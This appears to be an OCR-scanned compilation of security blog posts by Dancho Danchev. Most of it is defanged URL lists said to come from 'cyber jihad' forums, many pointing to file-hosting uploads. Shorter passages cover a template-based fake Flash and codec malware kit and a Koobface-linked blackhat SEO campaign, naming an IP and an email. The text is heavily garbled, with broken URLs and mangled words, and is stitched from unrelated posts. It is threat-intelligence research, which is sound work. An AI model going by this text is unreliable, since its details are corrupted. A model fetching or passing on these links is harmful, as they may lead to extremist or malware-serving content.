hxxp://fidyanabdulfattah. blogspot.com 


1. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEg1aqBGul 7hh7fvbZVvw6qeAW4asvvNmgul4q8dHg2rs2iUx 
FRM2AU5MznOBTeFXfnR1_pd8- oyvIrh2F5pTu53LQomOPXwPKFHWCE 
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1 
Folks, 


Here’s the second batch of URLs found on publicly accessible cyber jihad forums which | 
obtained using technical collection. 


Sample URLs found on publicly accessible cyber jihad forums include: 


hxxp://news.bbc.co.uk/1/hi/uk _politics/6739681.stm 
hxxp://www.informationclearinghouse.info/article9111.htm 
hxxp://www.chaaban.info/2007/01/02/saddam-hussein-execution-video/ 
hxxp://www.indymedia.org.uk/en/2007/03/365615.html 
hxxp://news.bbc.co.uk/1/hi/world/asia-pacific/6336333.stm 


hxxp://www.dailymail.co.uk/pages/live/articles/news/news.html?in _article _id=461031 
&amp;in page _id=1770 


hxxp://isupporttheresistance. blogspot.com/2007/06/pakistan-to-show-us-how-it- is-done.html 


hxxp://www.khaleejtimes.com/DisplayArticleNew.asp?xfile=data/subcontinen - 
t/2007/June/subcontinent June353.xml &amp;section=subcontinent &amp;col= 


hxxp://in.today.reuters.com/news/newsArticle.aspx?type=worldNews &amp;storyID=2007-06- 
05T175921Z 01 NOOTR_RTRJONC _0O_India-301583-1.xml &amp;archived=False 


hxxp://en.wikipedia.org/wiki/British National Party #Ilmmigration and_related issues 
hxxp://www.bnp.org.uk/candidates2005/manifesto/manf3.htm 


hxxp://www.jpost.com/servlet/Satellite?cid=1181228582339 &amp;pagename=)JPost %2FJPAr- 
ticle %2FShowFull 


hxxp://www.enoughoccupation.org/?7lid=13692 


hxxp://timesofindia.indiatimes.com/London _saddles _up _for _nude _bike 
_race/articleshow/2111548.cms 


hxxp://www.informationclearinghouse.info/article3940.htm 
hxxp://www.msnbc.msn.com/id/9652810/ 
hxxp://www.sciri.btinternet.co.uk/English/Saddam _Crimes/saddam _crimes.html 
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hxxp://www.americandaily.com/article/11093 


hxxp://www. myleftwing.com/showDiary.do;jsessionid=FOA90B4E9F248D24C09 - 
5190C75A73821?diaryld=8963 


hxxp://blamebush.typepad.com/blamebush/2006/12/saddam _hussein _.html 
hxxp://www.iraqslogger.com/index.php/post/3135/New Saddam __Hussein Execution Video 


hxxp://newsvote.bbc.co.uk/sport1/hi/other _sports/olympics _2012/6718243.stm?dynamic 
_vote=ON #vote olympic logo 


hxxp://thefallofhumanity.blogspot.com/2007/06/olympic-logo-spells-zion.htm! 
hxxp://timesonline.typepad.com/comment/2007/06/its _a_ zionist _p.html 
hxxp://www.petitiononline.com/Zion2012/petition.html 


hxxp://ahmedismailibrahim.wordpress.com/2007/05/24/debbi-schlussel-is-back-wi th-her- 
islamophobic-nonsense/ 


hxxp://mediamatters.org/items/200704170006 
hxxp://www.debbieschlussel.com/archives/2007/06/londonistan _oly.html 
hxxp://timesonline.typepad.com/comment/2007/06/deep _sigh.html 
hxxp://dizzythinks.net/2007/06/olympic-jewish-plot.html 
hxxp://fulhamreactionary.blogspot.com/2007/06/muslim-blogger-fear-zionist-ten tacles.html 
hxxp://timblair.net/ee/index.php/weblog/jolly shut ins _targeted/ 
hxxp://oliverkamm.typepad.com/blog/2007/06/bizarre people.html 
hxxp://news.bbc.co.uk/1/hi/england/manchester/6736809.stm 
hxxp://www.grumpygamer.biz/home.php/2007/06/09/manchester cathedral vs sony 
hxxp://thehardsell.wordpress.com/2007/06/09/oh-come-on/ 
hxxp://www.sanctus1.co.uk/blog/2007/06/cathedral-treads-path-of-most.html 


hxxp://www.mattwardman.com/blog/2007/06/09/video-game-battle-between-sony-and - 
church-of-england-the-legal-angle/ 


hxxp://blogesque.wordpress.com/2007/06/09/church-of-england-vs-the-public-dom ain/ 


hxxp://nuncscio.com/2007/06/09/sony-stages-violent-gun-battle-in-cathedral-ch urch-a-little- 
miffed/ 


hxxp://www. prattle.net/archives/002232.html 


hxxp://teenagepolitician.wordpress.com/2007/06/09/church-says-use-of-cathedra __|-in-video- 
game-is-beyond-belief/ 


hxxp://johnib.wordpress.com/2007/06/09/sony-lays-an-egg-manages-to-make-an-en emy-of- 
the-church-of-england/ 


hxxp://www.mediawatchwatch.org.uk/?p=730 


hxxp://www.pulpmovies.com/gagwatch/2007/06/chuch-has-trouble-understanding-fi ction- 
shock/ 


hxxp://timescolumns.typepad.com/gledhill/2007/06/gun _battle in _m.html 
hxxp://www.guardian.co.uk/uklatest/story/0,,-6696616,00.html 
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hxxp://www.manchestereveningnews.co.uk/news/s/1008/1008758 church _slams_sony _over 
_computer game.html 


hxxp://www.truthbeknown.com/victims.htm 

hxxp://news.bbc.co.uk/1/hi/uk/6721789.stm 

hxxp://www.parishiltonblog.org/ 

hxxp://news.bbc.co.uk/2/6735631.stm 
hxxp://www.celebsevolution.com/celebrities/paris-hilton/paris-hilton-is-going -back-to-jail/ 
hxxp://saim-baig.blogspot.com/2007/06/judge-orders-paris-hilton-back-to-jail.ht ml 
hxxp://www.nytimes.com/2007/06/08/us/08cnd-paris.html? _r=1 &amp;oref=slogin 
hxxp://www.celebslam.com/paris-hilton-muslim-burga 


hxxp://www.islamonline.net/servlet/Satellite?c=Article Cc &amp;cid=1156077734147 
&amp;pagename=Zone-English-Muslim _Affairs %2FMAELayout 


hxxp://www.jihadwatch.org/archives/011391.php 
hxxp://blogs.orlandosentinel.com/entertainment tv _tvblog/2007/06/a _whole lotta _p.html 
hxxp://www.google.com/trends?hl=en 


hxxp://www.google.com/trends?q=paristhilton %2C+Darfur %2C+Palestine %2C+lraq 
&amp;ctab=0 &amp;hl=en &amp;geo=GB &amp;geor=all &amp;date=2007 &amp;sort=0 


hxxp://www.google.com/trends?q=paristhilton %2C+Darfur %2C+Palestine %2C+lraq 
&amp;ctab=0 &amp;hl=en &amp;geo=US &amp;geor=all &S&amp;date=2007 &amp;sort=0 


hxxp://www.reuters.com/article/tooNews/idUSPEK13633620070609 
hxxp://english.aljazeera.net/NR/exeres/3BF35595-D041-4F1B-B0O1C-EFF490505754.h tm 
hxxp://www.metimes.com/storyview. php?StoryID=20070609-070319-7988r 
hxxp://english.aljazeera.net/NR/exeres/13E06C7B-010E-4DB9-A79D-E7F80DE23AEB.h tm 


hxxp://www.ccun.org/News/2007/June/8 %20n/Saturday %209 %20June %20A %20global 
%20day %200f %20protest %20against %20the %20oppressive %2O0Israeli %200ccupation 
%200f %20Palestinian %20land.htm 


hxxp://commentisfree.guardian.co.uk/inayat bunglawala/2007/06/mystery _demo.html 
hxxp://www.mcb.org.uk/ 
hxxp://writeoussisterspeaks.wordpress.com/2007/06/08/carnival-of-islam-in-t he-west-3/ 
hxxp://5cc.blogspot.com/2007/06/express-and-more-council-calling.htm! 
hxxp://www.pickledpolitics.com/archives/1183 
hxxp://www.blink.org.uk/pdescription.asp?key=14936 &amp;grp=1 &amp;cat=197 


hxxp://www.conservatives.com/tile.do?def=news.story.page &amp;obj _id=136991 
&amp;speeches=1 


hxxp://www.telegraph.co.uk/news/main.jhtml;jsessionid=AWVOS2T4E55TV - 
QFIQMFSFGGAVCBQOIV0?xml=/news/2007/06/06/nbrown106.xml 


hxxp://bloggingyoungfogey.blogspot.com/2007/06/britain-day-whatever-next.htm| 
hxxp://politics.guardian.co.uk/homeaffairs/story/0,,2095806,00.html 
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hxxp://hurryupharry.bloghouse.net/archives/2007/06/07/your worst _nightmare.php 
hxxp://www.islamonline.com/news/newsfull.php?newid=10283 
hxxp://www.timeout.com/london/features/2993.html 


hxxp://littlegreenfootballs.com/weblog/?entry=25788 Timeout London Welcomes _Islamic 
_Overlords &amp;only 


hxxp://mosquewatch.blogspot.com/2007/06/islamic-london-would-be-better-place. html 
hxxp://www.bnp.org.uk/news _detail.php?newsld=1553 
hxxp://www.brusselsjournal.com/node/2167 

hxxp://www.brusselsjournal.com/node/2168 
hxxp://implicit.harvard.edu/implicit/study.html 
hxxp://samirachoudhury.blogspot.com/2007/04/islamophobia-test.html 
hxxp://www.express.co.uk/ 

hxxp://www.channel4.com/bigbrother/ 


hxxp://www.islamophobia-watch.com/islamophobia-watch/2005/3/24/harrys-place-a nd- 
islamophobia-watch.html 


hxxp://hurryupharry.bloghouse.net/ 

hxxp://www.diogeneslamp.net/?p=847 
hxxp://www.opinionjournal.com/editorial/feature.html?id=110010123 
hxxp://crusaderwatcher.blogspot.com/2007/06/jewish-nazi-terrorist-advocates-m urder.html 


hxxp://www.news.com.au/heraldsun/story/0,21985,21844401-5005961,00.html?from= public 
_rss 


hxxp://islamophobiawatcher.blogspot.com/2007/05/londonistan-on-fascists-map.h tml 
hxxp://news.bbc.co.uk/1/hi/world/americas/6720315.stm 


hxxp://www.themuslimweekly.com/fullstoryview.aspx?NewsID=460D559E17BD94CE26 
8F44FE &amp;MENUID=HOMENEWS &amp;DESCRIPTION=UK %20News 


hxxp://news.bbc.co.uk/1/hi/uk/5242564.stm 


hxxp://www.islamophobia-watch.com/islamophobia-watch/2007/6/5/cameron-accuses-m 
uslims-of-cultural-separatism.htm| 


hxxp://www.spiegel.de/international/europe/0,1518,476599,00.htm! 
hxxp://thelede.blogs.nytimes.com/2007/06/04/paris-hilton-reports-to-the-big -house/ 
hxxp://www.danielpipes.org/comments/30819 

hxxp://www.tawfikhamid.com/index.html 
hxxp://secularislam.org/blog/post/summit/3/Speakers 

hxxp://incisive-view.blogspot.com/ 

hxxp://en.wikipedia.org/wiki/Sunny _Hundal 
hxxp://incisive-view.blogspot.com/2007/05/sunny-hundal-islamophobe-proudly-flys .hAtml 
hxxp://incisive-view.blogspot.com/2007/05/2nd-instalment-as-promised-second.htm | 
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hxxp://incisive-view. blogspot.com/2007/05/sunny-hundal-silent-regarding-israeli .Atm| 
hxxp://forum.mpacuk.org/showthread.php?t=8987 

hxxp://jihadandthecity. wordpress.com/2006/12/08/pop-sunny-jumps-on-the-band-w agon/ 
hxxp://jinadandthecity. wordpress.com/2006/11/26/soumaya-socks-it-to-sunny/ 
hxxp://www.mpacuk.org/content/view/893/ 


hxxp://commentisfree.guardian.co.uk/inayat _bunglawala/2006/11/its _not personal sunny 
_its _str_1.html 


hxxp://securebar.secure-tunnel.com/cgi-bin/nph-freebar.cgi/110110A/http/comment _ isfree.g- 
uardian.co.uk/take _two/2007/03/sunny _v_inayat how _can_we_defe.html 


hxxp://mpowering-us.blogspot.com/2007/06/sunny-hundal-exposed.html 
hxxp://rachelnorthlondon.blogspot.com/2007/06/c4-and-conspiracy-theories.html 
hxxp://littlegreenfootballs.com/weblog/?entry=25751 


hxxp://littlegreenfootballs.com/weblog/?entry=25762 Video- Followup _on_UK Muslim _7-7 
_Denial Survey &amp;only 


hxxp://www.freedomszone.com/archives/2007/06/60 _of _uk_muslims deny _77 _bombi.php 
hxxp://moderntribalist.blogspot.com/2007/06/britain-one-in-four-muslims-belie ve.html 
hxxp://upfromtheslime.blogspot.com/2007/06/whats-britishism-for-loose-change. html 
hxxp://www.narbosa.com/2007/06/uk-muslim-poll-shocking-results.html 
hxxp://hurryupharry.bloghouse.net/archives/2007/06/04/proliferation of dancing cows.php 
hxxp://pommygranate.blogspot.com/2007/06/leading-leftwing-uk-blog-harrys-plac e.html 


hxxp://www.channel4.com/news/articles/society/religion/survey+governmen - 
t+hasnt+told+truth+about+ 77/545847 


hxxp://politics.guardian.co.uk/terrorism/story/0,,2095752,00.html 
hxxp://epluribusreluctor.blogspot.com/2005/07/blair-knew.htm| 
hxxp://edwardhenry.wordpress.com/2007/04/18/muslim-integration-in-britain/ 
hxxp://sumayyahevans.blogspot.com/2007/06/quarter-of-muslims-believe-77-was.h tml 
hxxp://www.mpacuk.org/content/view/3707/34/ 
hxxp://www.endtheoccupation.org/index.php 
hxxp://angryarab.blogspot.com/2007/06/there-is-new-mufti-in-town.html 


hxxp://www.islamophobia-watch.com/islamophobia-watch/2007/6/4/blair-engages-wit h- 
moderate-muslims-but-excludes-mcb.html 


hxxp://www.mpacuk.org/content/view/3710/34/ 
hxxp://politics.guardian.co.uk/homeaffairs/story/0,,2094977,00.html 
hxxp://news.bbc.co.uk/1/hi/uk _politics/6718235.stm 
hxxp://www.muslimnews.co.uk/news/news.php?article=12859 
hxxp://www.iht.com/articles/2007/06/04/news/brits.php 
hxxp://opinionjournal.com/extra/?id=110010164 
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hxxp://www.guardian.co.uk/comment/story/0,,2094484,00.htm| 


hxxp://www.islamophobia-watch.com/islamophobia-watch/2007/6/4/blair-can-no-lo nger-deny- 
a-link-exists-between-terrorism-and.html 


hxxp://news.bbc.co.uk/1/hi/education/6713373.stm 
hxxp://free-dom-uk.blogspot.com/2007/06/radical-muslims.html 
hxxp://www.cfr.org/ 

hxxp://www.foreignaffairs.org/ 


hxxp://www.foreignaffairs.org/20050701faessay84409-p0/robert-s-leiken/europe- s-angry- 
muslims.html 


hxxp://www.americanchronicle.com/articles/viewArticle.asp?articlelD=2 8683 
hxxp://www.onenewsnow.com/2007/05/observer fears islamic _takeove.php 
hxxp://www.msnbc.msn.com/id/18853924/site/newsweek/ 
hxxp://www.conspiracyarchive.com/NWO/Council Foreign Relations.htm 
hxxp://stefzucconi.blogspot.com/2007/06/more-british-oppression.html 
hxxp://postmanpatel.blogspot.com/2007/06/race-riot-in-whitehall-14707-nicely. html 
hxxp://petitions.pm.gov.uk/buildmosque/ 

hxxp://en.wikipedia.org/wiki/St Paul %27s Cathedral 
hxxp://en.wikipedia.org/wiki/Neasden Temple 
hxxp://petitions.pm.gov.uk/ScrapMegaMosque/ 
hxxp://www.blink.org.uk/pdescription.asp?key=14662 &amp;grp=1 
hxxp://politics.guardian.co.uk/homeaffairs/story/0,,2081071,00.html 
hxxp://observer.guardian.co.uk/uk _news/story/0,,1939889,00.html 
hxxp://www.blogistan.co.uk/blog/mt.php/2007/06/02/the mega _mosque _petition 
hxxp://www.jihadwatch.org/dhimmiwatch/archives/016659.php 
hxxp://www.bnp.org.uk/news _detail.php?newsld=1429 
hxxp://umarlee.com/2007/06/01/michael-evans-iran-and-muslims/ #comment-10167 
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tube-best-4free .com 
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Who's behind these domains and the Harry Potter blackhat SEO campaign? But, "of course", 
it’s the "[8]fan club" with the [9]Koobface connection, continuing to use [10]the same phone 
back locations that they’ve been using during [11]the past couple of months - myart-gallery 
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216.240.146.119 - Email: chucjack@gmail.com. 


This post has been reproduced from [12]Dancho Danchev’s blog. 


. http: //ddanchev. blogspot .com/2009/02/template-ization-of-malware-serving. htm 
. http: //ddanchev. blogspot .com/2008/07/template-ization-of-malware-serving. htm 


ttp://ddanchev. blogspot .com/2009/04/bogus-linkedin-profiles-redirect-to.htm 


_ http: //adanchev blogspot .con/2009/02/take- codec~ serving donains~fron. html 

_http://adanchev blogspot. con/2008/08/phishing-pages-for~every-bank-are.htal 
_hetp://ologe. zdnet .con/security/7p-3575 

|" hetp: //www.virustotal.,con/analisis/3£50aa3f6ia314a99aa6113i077a67eS86e06c06Facaba61ab50018465950- 12487 
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3: 
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7 


8. http: //ddanchev. blogspot .com/2009/06/from-ukrainian-blackhat-seo-gang-with.htm 


9. http: //ddanchev. blogspot .com/2009/07/koobface-come-out-come-out-wherever-you.htm 
10. http: //ddanchev.blogspot .com/2009/07/from-ukraine-with-bogus-twitter .htm 


11. http: //ddanchev.blogspot.com/2009/06/from-ukrainian-blackhat-seo-gang-with_09.htm 


12. http://ddanchev.blogspot.com/ 
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The [1]standardization through [2]template-ization of bogus codec/flash player/video pages, 
taking place during the past two years, has exponentially increased the [3]efficiency levels of 
malware campaigns relying exclusively on [4]social engineering. 


Just like [5]phishing pages being commodity, these commodity spoofs of legitimate soft- 
ware/plugins relying on "visual social engineering" represent a market segment by themselves, 
one that some cybercriminals have been attempting to monetize for a while. 
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Case in point - their latest attempt to do so comes in the form of the first social engineering 
driven web malware exploitation kit. 


My Fake The Onginal 


per FLASH® PLAYER Ff ADOBE® FLASH® PLAYER 


= ay An update tolvour Adobe Flash Plaverls available 
Flash Player enbances you Wed beowsung expenence Flash Player entances your Wied browsing enperiense: 
Thas wpdate inchades: This epdate inchudes 
© Secunty enhancements described m this Secunty Bulletan Beart, erence ert Sesaibed ha 
To change of 


Pred tnd the 


you update notifications, Chek ate Nothoabots he 


Updating tates ender 2 minute on Broadband, no restart is requires 


Updating take under a menute on broadband, no restart is reqaered 


Reninsettm | __Dartirtat_| 


Despite that the kit’s author has ripped off a well known exploits-serving malware kit’s 
statistics interface, what’s unique about this release is the fact that the exploit modules come 
in the form of "Missing Flash Player", "Outdated Flash Player", "Missing Video Codec", 
"Outdated Video Codec", "Codec Required" modules. 


These very same modules represent the dominant social engineering attack vector on the 
Internet due to the quality of the spoofs and the end users’ gullibility while self-infecting 
themselves. For the time being, the author appears to be an opportunist rather than 
someone interested in setting new benchmarks for standardization social engineering by 
using the efficiency and delivery methods offered by a web malware exploitation kit. 
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hxxp://www.stopfundamentalism.com/index.php?option=com _content & #038;task=view & 
#038;id=778 & #038;Iltemid=1 


hxxp://www.zeenews.com/znnew/articles.asp?rep=2 & #038;aid=325799 & #038;sid=WOR 
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hxxp://www.msnbc.msn.com/id/14740070/site/newsweek/ 
hxxp://www.telegraph.co.uk/news/main.jhtml?xml=/news/2006/09/14/wiraq14.xml 
hxxp://iraqwar.mirror-world.ru/article/102317 


hxxp://www.boston.com/news/globe/editorial _opinion/oped/articles/2006/08/31/the true 
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hxxp://www.alternet.org/story/14099/ 
hxxp://zfacts.com/p/169.html 
hxxp://politics.guardian.co.uk/iraq/story/0,,1865690,00.html 


hxxp://www.mirror.co.uk/news/tm _objectid=17684874 %26method=full %26siteid=94762 
%26headline=exclusive-how-blair-will-go-name _page.html 


hxxp://www.alternet.org/blogs/video/41108/ 


hxxp://www.cbsnews.com/stories/2005/01/10/iraq/main665758.shtml?CMP=ILC-Searc —hSto- 
ries 


hxxp://www.counterpunch.org/nimmo05082004.html 
hxxp://www.guardian.co.uk/comment/story/0,3604,1210490,00.html 
hxxp://www.guardian.co.uk/Iraq/Story/0,2763,1228666,00.html 
hxxp://www.washingtonpost.com/ac2/wp-dyn/A9130-2004May7?language=printer 
hxxp://politics.guardian.co.uk/iragq/story/0,12956,1518794,00.html 
hxxp://www.msnbc.msn.com/id/13124487/ 
hxxp://www.newstatesman.com/200608070017 
hxxp://seattlepi.nwsource.com/national/280196 _rosyrumsfeld05.html?source=mypi 
hxxp://www.news24.com/News24/World/Iraq/0,,2-10-1460 _1978899,00.html 
hxxp://www.zmag.org/content/showarticle.cfm?IltemID=5653 
hxxp://amconmag.com/2005 _07 _18/article.html 
hxxp://www.boston.com/news/globe/ideas/articles/2005/07/03/why do suicide bombers do 
it/ 
hxxp://www.rense.com/general30/blair.htm 


hxxp://www.dailymail.co.uk/pages/live/articles/news/news.html?in _article _id=398178 & 
#038;in_ page id=1770 & #038;in_ page _id=1770 & #038;expand=true #StartComments 
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hxxp://www.opendemocracy.net/globalization-institutions | _government/blair _ignorance 
_3718.jsp 


hxxp://www.counterpunch.org/whitney12162004.html 
hxxp://thinkprogress.org/2007/05/11/18-dead-in-irag-car-bombs/ 
hxxp://functionformdesign.typepad.com/alan/2007/05/the _cost _of _war.html 
hxxp://www.blackfive.net/main/2007/05/update funding _.html 


hxxp://hotair.com/archives/2007/05/10/majority-of-iraqi-mps-endorse-bill-dema nding- 
timetable-for-us-withdrawal/ 

hxxp://lubbockmarineparents. blogspot.com/2007/05/you-know-youve-been-in-iraq- too- 
long.html 

hxxp://iraqsolidaritycampaign.blogspot.com/2007/05/infant-mortality-soars-by- 150- 


percent.html 

hxxp://middleeastparadise.blogspot.com/2007/05/iraq.html 
hxxp://wwwmikeylikesit.blogspot.com/2007/05/robert-knight-iraq-apathethy.html 
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hxxp://gate911.net/2007/05/12/britains-brown-vows-to-learn-from-iraq-ap-3/ 
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ECRET VIDEO 


Your Flash player is out of date ! 


You must have the new Plug-in 
Flash Player to watch this Video. 


Click Here to Download 


WE ARE NOT ALONE 


Interestingly, a huge number of fake codec serving web sites are already detecting the 
OS/Browser of the visitor, and serving [6]Mac OS X based malware or Windows based 
malware based on the detection. This fact, as well as the fact that visual spoofs of OS X like 
dialogs are also getting template-ized are not a coincidence - it’s a signal for an efficient and 
social engineering driven malware delivery mechanism in the works. The development of the 
kit will be monitored and updates posted - if any. 


Meanwhile, the recent blackhat SEO campaign which attempted to hijack 'Harry Potter and 
the Half-Blood Prince’ related traffic is a good example on how despite the magnitude of the 
Campaign - hundreds of thousands of indexed and malware serving pages - due to the 
manual campaign management, its centralized nature makes it easier to shut down. 
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hxxp://en.wikipedia.org/wiki/2003 invasion of Iraq 
hxxp://www.guyrintoul.com/2007/05/11/blairs-iragq-legacy/ #comment-1162 
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hxxp://sdfsdfsdfsdfsdf.com 

hxxp://www.westernresistance.com 
hxxp://velvethammer.wordpress.com/2007/04/01/i-am-john-doe-the-infidels-manif esto/ 
hxxp://www.politicalstew.com 

hxxp://tinyurl.com/plkat 

hxxp://americanjihad.blogspot.com 

hxxp://britandgrit.com 

hxxp://www.allaboutmuhammad.com/index.html 
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hxxp://opinionated.blogsome.com/2005/09/12/uk-fuel-protest/ 
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hxxp://radicalmuslim.blogsome.com/2007/05/14/mega-mosque-petition/feed/ 
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hxxp://www.nationalistblog.blogspot.com 
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hxxp://peacebruv.blogspot.com 
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hxxp://radicalmuslim.blogsome.com/what-is-the-victory-of-islam/ 
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Folks, 


Here’s the second batch of URLs found on publicly accessible cyber jihad forums which | 
obtained using technical collection. 


Sample URLs found on publicly accessible cyber jihad forums include: 


hxxp://www.shmoD5alislam.net/vb/showthread.php?p=53073 &posted=1 #post53073 
hxxp://www.shmoD5alislam.net/vb/showthread.php?t=10505 
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hxxp://www.megaupload.com/?d=U1WIEFGG 
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hxxp://depositfiles.com/files/1858803 
hxxp://depositfiles.com/files/1858807 
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hxxp://www.fileflyer.com/view/LBRaIAi 
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hxxp://www.filefactory.com/file/989a48 
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hxxp://tornadodrive.com/download.php/3635/3.rar.html 
hxxp://www.megafileupload.com/en/file/11242/3-rar.html 
hxxp://www.megafileupload.com/en/file/11217/3-3gp.html 
hxxp://www.megafileupload.com/en/file/11218/3-3gp.html 
hxxp://www.viprasys.com/host/download.php?file=5593.3gp 
hxxp://www.bestsharing.com/files/bikF 7Rq341216/3.rar.html 
hxxp://www.wikiupload.com/download _page.php?id=210726 
hxxp://archiv.to/?Module=Details &amp;HashID=FILE46F399E48A406 
hxxp://archiv.to/?Module=Details &amp;HashID=FILE46F399F5A421F 
hxxp://archiv.to/?Module=Details &amp;HashID=FILE46F399B1B0978 
hxxp://archiv.to/?Module=Details &amp;HashID=FILE46F399C3A48EB 
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hxxp://archiv.to/?Module=Details &amp;HashID=FILE46F399D42D3CF 
hxxp://www.good4upload.com/v/1286871/1190365992245.rar.html 
hxxp://www.oxedion.com/index.php/download/14473656c12fl0ece2669ebee5d6edf7 
hxxp://www5.oxedion.com/index.php/downloads/b396f9b14969e22ef575a327dbalf8f 4? 
hxxp://www1.oxedion.com/index.php/downloads/e2a40f381c1f00c66a12bf527966609 8? 
hxxp://www2.oxedion.com/index.php/downloads/326e529de69c2afae8f24a066cfc183 2? 
hxxp://www.uploadcomet.com/download.php?file=4b74f7d5ce8a83af8735024e8c3951 be 
hxxp://www.uploadcomet.com/download.php?file=e71b60183854a24f79231f2c8a3c59 42 
hxxp://www1.oxedion.com/index.php/downloads/b63e7c8134af2e313a288199 dda3d4fl1? 
hxxp://www1.oxedion.com/index.php/downloads/0272493b3dd365375a0597964a651 43d? 
hxxp://www.upload.pk/freeupload/download.php?file=4b74f7d5ce8a83af8735024e8c3 951lbe 
hxxp://depositfiles.com/files/1756798 

hxxp://depositfiles.com/files/1756984 

hxxp://www.speedshare.org/j48u1ISODb 

hxxp://www.megaupload.com/?d=KKN6NK5E 
hxxp://picshome.com/download.php?id=7D602C2A1 
hxxp://uploadpalace.com/en/file/10109/new-avi.html 
hxxp://picshome.com/download.php?id=6EA411271 
hxxp://picshome.com/download.php?id=BC6F6FEA1 
hxxp://www.upload.pk/freeupload/download.php?file=f7 3ce6a3ba3f89edf102e0584 62be31e 


hxxp://www.mercuryupload.com/media/download.php?file=f73ce6a3ba3f89edf102e0 
58462be31le 


hxxp://fyad.org/ph8v 
hxxp://depositfiles.com/files/1756897 
hxxp://depositfiles.com/files/1756908 
hxxp://www.megaupload.com/?d=O0S5BRK]) 
hxxp://www.megaupload.com/?d=61VJ6PC3 
hxxp://www.savefile.info/file/3767/new-rmvb.html 
hxxp://4filehosting.com/file/72969/new-rmvb.html 
hxxp://rapidshare.com/files/55417487/new.rmvb.html 
hxxp://rapidshare.com/files/55417610/new.rmvb.htm! 
hxxp://picshome.com/download.php?id=DCE7515A1 
hxxp://www.upitus.com/download.php?file=8e47a5c5 
hxxp://www.maxishare.net/en/file/2 716/new-rmvb.html 
hxxp://uploadpalace.com/en/file/10111/new-rmvb.html 
hxxp://www.archive.org/download/missing-man1/new.rmvb 
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hxxp://www.archive.org/download/missing-man2/new.rmvb 
hxxp://www.archive.org/download/missing-man3/new.rmvb 
hxxp://www.archive.org/download/missing-man4/new.rmvb 
hxxp://www.archive.org/download/missing-man5/new.rmvb 
hxxp://www.archive.org/download/missing-man6/new.rmvb 
hxxp://www.archive.org/download/missing-man7/new.rmvb 
hxxp://www.archive.org/download/missing-man8/new.rmvb 
hxxp://www.archive.org/download/missing-man9/new.rmvb 
hxxp://ia341206.us.archive.org/2/items/missing-man1/new.rmvb 
hxxp://ia341228.us.archive.org/0/items/missing-man2/new.rmvb 
hxxp://ia341206.us.archive.org/1/items/missing-man3/new.rmvb 
hxxp://ia341224.us.archive.org/0/items/missing-man4/new.rmvb 
hxxp://ia341206.us.archive.org/3/items/missing-man5/new.rmvb 
hxxp://ia341240.us.archive.org/0/items/missing-man6/new.rmvb 
hxxp://ia341230.us.archive.org/3/items/missing-man7/new.rmvb 
hxxp://ia341234.us.archive.org/1/items/missing-man8/new.rmvb 
hxxp://ia341218.us.archive.org/3/items/missing-man9/new.rmvb 
hxxp://ia341224.us.archive.org/3/items/missing-man10/new.rmvb 
hxxp://www.archive.org/download/missing-man10/new.rmvb 


hxxp://www.upload.pk/freeupload/download.php?file=64ee82ac5c468c558 
lae7dd19d82814c 


hxxp://fyad.org/ph8y 
hxxp://depositfiles.com/files/1756963 
hxxp://depositfiles.com/files/1756965 
hxxp://www.megaupload.com/?d=H2BDCOAY 
hxxp://www.savefile.info/file/3768/new-rm.html 
hxxp://www.megaupload.com/?d=3EBGODYP 
hxxp://4filehosting.com/file/72971/new-rm.html 
hxxp://www. youploadit.com/file/507/new.rm.html 
hxxp://rapidshare.com/files/55419963/new.rm.html 
hxxp://rapidshare.com/files/55419990/new.rm.html 
hxxp://www.maxishare.net/en/file/2717/new-rm.html 
hxxp://uploadpalace.com/en/file/10112/new-rm.html 
hxxp://picshome.com/download.php?id=91D371B11 
hxxp://www.upitus.com/download.php?file=2bc00605 
hxxp://www.uploadcomet.com/download.php?file=bcbd30ca99645c44c29b9888ff0cdc 2b 
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hxxp://www.upload.pk/freeupload/download.php?file=bcbd30ca99645c44c2 9b9888ffOcdc2b 


hxxp://fyad.org/ph8x 

hxxp://depositfiles.com/files/1757007 
hxxp://depositfiles.com/files/1757022 
hxxp://www.megaupload.com/?d=K1V5PQ8G 
hxxp://www.megaupload.com/?d=D5RPCGOR 
hxxp://www.savefile.info/file/3769/new-3gp.html 
hxxp://4filehosting.com/file/72972/new-3gp.html 
hxxp://www.youploadit.com/file/508/new.3gp.html 
hxxp://primeupload.com/file/131471/new.3gp.html 
hxxp://rapidshare.com/files/55421276/new.3gp.html 
hxxp://rapidshare.com/files/55421178/new.3gp.html 
hxxp://www.maxishare.net/en/file/2718/new-3gp.html 
hxxp://uploadpalace.com/en/file/10113/new-3gp.html 
hxxp://picshome.com/download.php?id=A5C065E21 
hxxp://www.upitus.com/download.php?file=e8b774e9 
hxxp://www.archive.org/download/missing-man1/new.3gp 
hxxp://www.archive.org/download/missing-man2/new.3gp 
hxxp://www.archive.org/download/missing-man3/new.3gp 
hxxp://www.archive.org/download/missing-man4/new.3gp 
hxxp://www.archive.org/download/missing-man5/new.3gp 
hxxp://www.archive.org/download/missing-man6/new.3gp 
hxxp://www.archive.org/download/missing-man7/new.3gp 
hxxp://www.archive.org/download/missing-man8/new.3gp 
hxxp://www.archive.org/download/missing-man9/new.3gp 
hxxp://www.archive.org/download/missing-man10/new.3gp 
hxxp://ia341206.us.archive.org/2/items/missing-man1/new.3gp 
hxxp://ia341228.us.archive.org/0/items/missing-man2/new.3gp 
hxxp://ia341206.us.archive.org/1/items/missing-man3/new.3gp 
hxxp://ia341224.us.archive.org/0/items/missing-man4/new.3gp 
hxxp://ia341206.us.archive.org/3/items/missing-man5/new.3gp 
hxxp://ia341240.us.archive.org/0/items/missing-man6/new.3gp 
hxxp://ia341230.us.archive.org/3/items/missing-man7/new.3gp 
hxxp://ia341234.us.archive.org/1/items/missing-man8/new.3gp 
hxxp://ia341218.us.archive.org/3/items/missing-man9/new.3gp 
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hxxp://ia341224.us.archive.org/3/items/missing-man10/new.3gp 
hxxp://www.viprasys.com/host/download.php?file=550new.3gp 
hxxp://www.uploadcomet.com/download.php?file=e3f88d347895f0493fdcbaed033b45 21 
hxxp://www.upload.pk/freeupload/download.php?file=e3f88d347895f0493fdcbaed0O 33b4521 
hxxp://fyad.org/pi2c 

hxxp://www.badongo.com/vid/473712 
hxxp://www.badongo.com/vid/473716 
hxxp://www.badongo.com/vid/473720 
hxxp://www.badongo.com/vid/473722 
hxxp://www.badongo.com/vid/473725 
hxxp://depositfiles.com/files/17 79336 
hxxp://depositfiles.com/files/17 79339 
hxxp://depositfiles.com/files/1775900 
hxxp://www.badongo.com/file/4368307 

